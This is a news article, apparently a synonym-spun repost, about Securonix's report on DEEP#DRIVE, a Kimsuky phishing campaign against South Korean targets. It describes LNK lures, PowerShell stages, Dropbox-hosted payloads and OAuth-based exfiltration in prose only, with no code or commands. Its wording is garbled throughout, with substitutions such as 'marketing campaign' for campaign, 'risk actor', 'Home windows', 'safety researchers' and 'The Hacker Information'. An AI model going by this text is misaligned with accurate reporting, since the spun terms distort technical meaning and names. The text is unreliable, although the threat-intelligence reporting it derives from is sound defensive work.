A nation-state risk actor with ties to North Korea has been linked to an ongoing marketing campaign focusing on South Korean enterprise, authorities, and cryptocurrency sectors.
The assault marketing campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group generally known as Kimsuky, which can also be tracked below the names APT43, Black Banshee, Emerald Sleet, Glowing Pisces, Springtail, TA427, and Velvet Chollima.
“Leveraging tailor-made phishing lures written in Korean and disguised as reliable paperwork, the attackers efficiently infiltrated focused environments,” safety researchers Den Iuzvyk and Tim Peck said in a report shared with The Hacker Information, describing the exercise as a “subtle and multi-stage operation.”
The decoy paperwork, despatched through phishing emails as .HWP, .XLSX, and .PPTX information, are disguised as work logs, insurance coverage paperwork and crypto-related information to trick recipients into opening them, thereby triggering the an infection course of.
The assault chain is notable for its heavy reliance on PowerShell scripts at varied levels, together with payload supply, reconnaissance, and execution. It is also characterised by the Dropbox for payload distribution and information exfiltration.
All of it begins with a ZIP archive containing a single Home windows shortcut (.LNK) file that masquerades as a reliable doc, which, when extracted and launched, triggers the execution of PowerShell code to retrieve and show a lure doc hosted on Dropbox, whereas stealthily establishing persistence on the Home windows host through a scheduled activity named “ChromeUpdateTaskMachine.”
One such lure doc, written in Korean, pertains to a security work plan for forklift operations at a logistics facility, delving into the protected dealing with of heavy cargo and outlining methods to make sure compliance with office security requirements.
The PowerShell script can also be designed to contact the identical Dropbox location to fetch one other PowerShell script that is chargeable for gathering and exfiltrating system data. Moreover, it drops a 3rd PowerShell script that is in the end chargeable for executing an unknown .NET meeting.
“The usage of OAuth token-based authentication for Dropbox API interactions allowed seamless exfiltration of reconnaissance information, equivalent to system data and energetic processes, to predetermined folders,” the researchers mentioned.
“This cloud-based infrastructure demonstrates an efficient but stealthy technique of internet hosting and retrieving payloads, bypassing conventional IP or area blocklists. Moreover, the infrastructure appeared dynamic and short-lived, as evidenced by the fast elimination of key hyperlinks after preliminary levels of the assault, a tactic that not solely complicates evaluation but additionally suggests the attackers actively monitor their campaigns for operational safety.”
Securonix mentioned it was capable of leverage the OAuth tokens to realize extra insights into the risk actor’s infrastructure, discovering proof that the marketing campaign might have been underway since September final 12 months.
“Regardless of the lacking closing stage, the evaluation highlights the delicate methods employed, together with obfuscation, stealthy execution, and dynamic file processing, which show the attacker’s intent to evade detection and complicate incident response,” the researchers concluded.
Source link